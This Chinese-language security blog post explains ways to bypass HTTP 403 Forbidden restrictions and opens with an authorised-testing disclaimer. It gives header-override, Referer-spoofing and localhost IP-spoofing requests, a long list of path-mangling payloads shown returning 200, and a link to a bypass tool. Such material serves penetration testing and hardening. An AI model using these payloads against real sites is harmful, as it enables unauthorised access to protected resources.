免责声明
月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!
该公众号由月落安全团队创建,旨在分享一些网络安全技术,红蓝对抗实战经验,新兴漏洞复现和奇门巧计,欢迎大家关注!
一、简介
HTTP 403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。服务器理解客户的请求,但拒绝处理它,通常由于服务器上文件或目录的权限设置导致的WEB访问错误。
二、端口利用
可以用nmap扫描,或者直接将IP输入网络空间搜索引擎进行搜索,看是否有其他的端口开放,寻找脆弱点。
三、覆盖请求绕过
通过支持 X-Original-URL 和 X-Rewrite-URL 标头,用户可以使用 X-Original-URL 或 X-Rewrite-URL HTTP 请求标头覆盖请求 URL 中的路径,尝试绕过对更高级别的缓存和 Web 服务器的限制
RequestGET /ylaq/Good HTTP/1.1ResponseHTTP/1.1 403 ForbiddenReqeustGET / HTTP/1.1: /ylaq/GoodResponseHTTP/1.1 200 OK
四、Referer 标头绕过
Referer 是 HTTP 请求header 的一部分,当浏览器(或者模拟浏览器行为)向web 服务器发送请求的时候,头信息里有包含 Referer 。比如我在www.google.com 里有一个www.baidu.com 链接,那么点击这个www.baidu.com,它的header 信息里就有:Referer=http://www.google.com
我们可以通过更改Referer来绕过不严谨的服务端验证
RequestGET /ylaq/Good HTTP/1.1Host: xxxResponseHTTP/1.1 403 ForbiddenReqeustGET / HTTP/1.1Host: xxxReFerer:https://xxx/ylaq/GoodResponseHTTP/1.1 200 OK
五、代理IP
在Reqeust包中也会包含有我们的IP来源信息,有的资源只允许它本机或者内网IP进行访问,这个时候我们就可以通过使用代理IP来绕过这一限制。
一些常见的代理IP标头
X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Client-IP: 127.0.0.1X-Host: 127.0.0.1
将其添加到Reqeust包任意位置即可。
六、请求路径绕过
如果我们直接去访问/ylaq/Good这个目录可能是403Forbidden,那么我们可以尝试在后面加个‘/’,即访问/ylaq/Good/,有可能成功绕过,下面整理了一些常用的绕过情况。
ylaq.com/Good => 403ylaq.com/Good/ => 200ylaq.com/Good// => 200ylaq.com//Good// => 200ylaq.com/Good/* => 200ylaq.com/Good/*/ => 200ylaq.com/Good/. => 200ylaq.com/Good/./ => 200ylaq.com/./Good/./ => 200ylaq.com/Good/./. => 200ylaq.com/Good/./. => 200ylaq.com/Good? => 200ylaq.com/Good?? => 200ylaq.com/Good??? => 200ylaq.com/Good..;/ => 200ylaq.com/Good/..;/ => 200ylaq.com/%2f/Good => 200ylaq.com/%2e/Good => 200ylaq.com/Good%20/ => 200ylaq.com/Good%09/ => 200ylaq.com/%20Good%20/ => 200
七、一款好用的4xx绕过工具
专为bypass4xx响应而生的一款工具
项目地址
https://github.com/lobuhi/byp4xx
以上就是绕过403Forbidden的全部思路,部分来源于网络,如有侵权烦请私信公众号。
欢迎各位大佬加入月落安全研究实验室。
原文始发于微信公众号(月落安全):403Forbidden
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论